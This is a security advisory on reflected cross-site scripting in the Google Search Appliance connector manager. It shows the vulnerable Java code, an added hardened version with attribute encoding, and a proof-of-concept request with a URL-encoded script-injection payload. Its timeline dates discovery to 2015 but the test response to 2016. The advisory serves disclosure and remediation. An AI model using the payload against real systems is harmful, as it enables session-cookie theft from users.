Multiple Cross Site Scripting Vulnerabilities
=============================================

Researcher: Timo Schmid

Description
===========

The Google Search Appliance (GSA) provides a management interface to interact with the installed connectors for the data crawling. This management interface contains multiple reflected Cross Site Scripting (XSS) vulnerabilities, which can be used to harvest the victim's session cookies. This also works for services running on other ports (for example the administrative console), as the cookie scope is not bound to the service port.

Exploitation Technique
======================

Remote

Status
======

Reported

Vulnerable Code Section
=======================

projects/connector-manager/source/java/com/google/enterprise/connector/servlet/ServletUtil.java:

[...]
    public static void writeMessageCode(PrintWriter out, ConnectorMessageCode status) {
      writeStatusId(out, status.getMessageId());
      if (status.getMessage() != null && status.getMessage().length() > 1) {
        writeXMLElement(out, 1, ServletUtil.XMLTAG_STATUS_MESSAGE, status.getMessage());
      }
      if (status.getParams() == null) {
        return;
      }
      for (int i = 0; i < status.getParams().length; ++i) {
        String param = status.getParams()[i].toString();
        if (param == null || param.length() < 1) {
          continue;
        }
        // param is concatenated into a double-quoted XML attribute value without any encoding
        out.println(indentStr(1) + "<" + XMLTAG_STATUS_PARAMS + " "
            + XMLTAG_STATUS_PARAM_ORDER + "=\"" + Integer.toString(i) + "\"" + " "
            + XMLTAG_STATUS_PARAM + "=\"" + param + "\"/>");
      }
    }
[...]
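As an added example (not code from this advisory or from the manager.v3 project), the loop above in its hardened form, applying the XML attribute encoding that the Solution section calls for. The class name, the tag-name constant values, the helper names and the wrapper element used by the round-trip check are assumptions made for this illustration. The check parses the emitted fragment with the JDK's DOM parser and confirms that the attribute decodes back to the original parameter, which is the property an attribute encoder has to guarantee.

```java
// Added example for this advisory; not code from the manager.v3 project.
// Class name, tag-name values, helper names and the wrapper element are
// assumptions chosen for the illustration, not the project's own.
import java.io.PrintWriter;
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;

public class EncodedStatusParams {

    // Placeholder tag names; the real values live in the project's ServletUtil.
    static final String XMLTAG_STATUS_PARAMS = "CMParams";
    static final String XMLTAG_STATUS_PARAM_ORDER = "Order";
    static final String XMLTAG_STATUS_PARAM = "CMParam";

    // XML attribute encoding: every character that can close a double-quoted
    // attribute value or start markup becomes a character reference. Control
    // characters other than TAB/LF/CR are illegal in XML 1.0 and are dropped
    // so the response stays well-formed.
    static String encodeXmlAttribute(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:
                    if (c >= 0x20 || c == '\t' || c == '\n' || c == '\r') {
                        sb.append(c);
                    }
            }
        }
        return sb.toString();
    }

    // Hardened counterpart of the loop in ServletUtil.writeMessageCode: element
    // and attribute names are trusted constants and the index is an int, so the
    // parameter value is the only attacker-influenced piece and the only one
    // that needs encoding. Null array elements are skipped instead of throwing.
    static void writeStatusParams(PrintWriter out, Object[] params) {
        if (params == null) {
            return;
        }
        for (int i = 0; i < params.length; ++i) {
            String param = params[i] == null ? null : params[i].toString();
            if (param == null || param.length() < 1) {
                continue;
            }
            out.println("  <" + XMLTAG_STATUS_PARAMS + " "
                    + XMLTAG_STATUS_PARAM_ORDER + "=\"" + i + "\" "
                    + XMLTAG_STATUS_PARAM + "=\"" + encodeXmlAttribute(param) + "\"/>");
        }
    }

    // Round-trip check: the rendered element must parse as XML and the
    // attribute must decode back to exactly the original parameter.
    static boolean roundTrips(String param) throws Exception {
        StringWriter sw = new StringWriter();
        writeStatusParams(new PrintWriter(sw), new Object[] { param });
        String xml = "<Wrapper>" + sw + "</Wrapper>"; // constructed wrapper element
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        Document doc = f.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
        Element el = (Element) doc.getDocumentElement()
                .getElementsByTagName(XMLTAG_STATUS_PARAMS).item(0);
        return el != null && param.equals(el.getAttribute(XMLTAG_STATUS_PARAM));
    }

    public static void main(String[] args) throws Exception {
        // The advisory's ConnectorType value, URL-decoded (constructed copy for the demo).
        String payload = "\"/><html:script xmlns:html=\"http://www.w3.org/1999/xhtml\">"
                + "alert(\"XSS\")</html:script><foo a=\"";
        StringWriter sw = new StringWriter();
        writeStatusParams(new PrintWriter(sw), new Object[] { payload, "", null, "plain" });
        System.out.print(sw);
        System.out.println("round-trips: " + roundTrips(payload));
    }
}
```

Compiled and run with a plain JDK (`javac EncodedStatusParams.java && java EncodedStatusParams`), the printed element shows the quotes and angle brackets of the payload as `&quot;`, `&lt;` and `&gt;`, so the attribute value cannot terminate early and no new element is created; the empty and null entries are skipped as in the original loop. The parser features set in `roundTrips` are the usual defensive configuration for any XML the application parses back, independent of the encoding fix.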
Proof of Concept
================

Using the current version (99ed927) from the git repository:

Request:

GET /connector-manager/getConfigForm?ConnectorType=%22%2F%3E%3Chtml%3Ascript+xmlns%3Ahtml%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22%3Ealert%28%22XSS%22%29%3C%2Fhtml%3Ascript%3E%3Cfoo+a%3D%22 HTTP/1.1
Host: 192.168.48.2:8080
Connection: keep-alive
User-Agent: python-requests/2.9.1
Accept-Encoding: gzip, deflate
Accept: */*

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=UTF-8
Content-Length: 182
Date: Tue, 05 Jan 2016 14:46:39 GMT

5304 alert("XSS")

Solution
========

The output of the servlets should be encoded according to its output context. In the current situation, XML attribute encoding of the params variable is required to prevent attacks.

Affected Versions
=================

>= git commit 51e438f9481308a3f91cd333e018fc654637d645
<  git commit e3fdfdbd1303ea76b296793c8e9f0b3eac4602d8

Timeline
========

2015-01-05: Vulnerabilities found
2015-01-05: GOOGLE informed
2016-01-07: Bugs confirmed
2016-03-03: Patches available at github

References
==========

[1] https://github.com/googlegsa/manager.v3/
[2] https://bufferoverflow.eu/BC-1503.txt
[3] https://www.insinuator.net/2016/03/classical-web-vulns-found-in-google-search-appliance-7-4

Advisory-ID
===========

BC-1503

Disclaimer
==========

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.